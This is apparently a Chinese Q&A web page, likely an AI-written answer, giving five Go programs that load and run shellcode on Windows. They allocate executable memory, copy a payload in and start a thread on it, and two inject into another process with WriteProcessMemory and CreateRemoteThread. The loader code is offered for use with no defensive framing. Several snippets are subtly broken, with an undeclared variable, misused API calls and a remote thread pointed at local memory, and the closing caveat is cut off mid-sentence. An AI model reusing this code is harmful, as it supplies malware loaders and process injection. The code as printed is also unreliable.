有其他不同加载shellcode类型的例子举例五个package mainimport syscall unsafefunc main shellcode = byteshellcode allocatedMemory _ _ = syscallSyscall6syscallNewLazyDLLkernel32dllNewProcVirtualAllocAddr 4 0 uintptrlens
以下是加载shellcode的五个不同类型的例子:
- 使用VirtualAlloc分配内存并使用RtlMoveMemory复制shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用VirtualAllocEx分配远程进程内存并使用WriteProcessMemory复制shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
processHandle, _ := syscall.OpenProcess(syscall.PROCESS_ALL_ACCESS, false, <pid>) // 替换<pid>为目标进程ID
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAllocEx").Addr(), 6, uintptr(processHandle), 0, uintptr(len(shellcode)), 0x3000, 0x40, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("WriteProcessMemory").Addr(), 4, uintptr(processHandle), allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateRemoteThread").Addr(), 5, uintptr(processHandle), 0, 0, allocatedMemory, 0, 0)
}
- 使用VirtualProtect分配内存并使用memcpy复制shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect").Addr(), 4, allocatedMemory, uintptr(len(shellcode)), 0x40, uintptr(unsafe.Pointer(&oldProtect)))
memcpy, _ := syscall.GetProcAddress(syscall.NewLazyDLL("msvcrt.dll").Handle, []byte("memcpy")) // 替换msvcrt.dll为适当的DLL
syscall.Syscall6(syscall.NewCallback(unsafe.Pointer(&memcpy)), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用CreateThread分配内存并使用memcpy复制shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0)
memcpy, _ := syscall.GetProcAddress(syscall.NewLazyDLL("msvcrt.dll").Handle, []byte("memcpy")) // 替换msvcrt.dll为适当的DLL
syscall.Syscall6(syscall.NewCallback(unsafe.Pointer(&memcpy)), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateThread").Addr(), 6, 0, 0, allocatedMemory, 0, 0, 0)
}
- 使用VirtualAlloc分配内存并使用CreateRemoteThread从远程进程中执行shellcode:
package main
import (
"syscall"
"unsafe"
)
func main() {
shellcode := []byte(<shellcode>)
processHandle, _ := syscall.OpenProcess(syscall.PROCESS_ALL_ACCESS, false, <pid>) // 替换<pid>为目标进程ID
allocatedMemory, _, _ := syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualAlloc").Addr(), 4, 0, uintptr(len(shellcode)), 0x3000, 0x40, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("RtlMoveMemory").Addr(), 3, allocatedMemory, uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), 0, 0, 0)
syscall.Syscall6(syscall.NewLazyDLL("kernel32.dll").NewProc("CreateRemoteThread").Addr(), 5, uintptr(processHandle), 0, 0, allocatedMemory, 0, 0)
}
请注意,上述代码中的
原文地址: https://www.cveoy.top/t/topic/hN4O 著作权归作者所有。请勿转载和采集!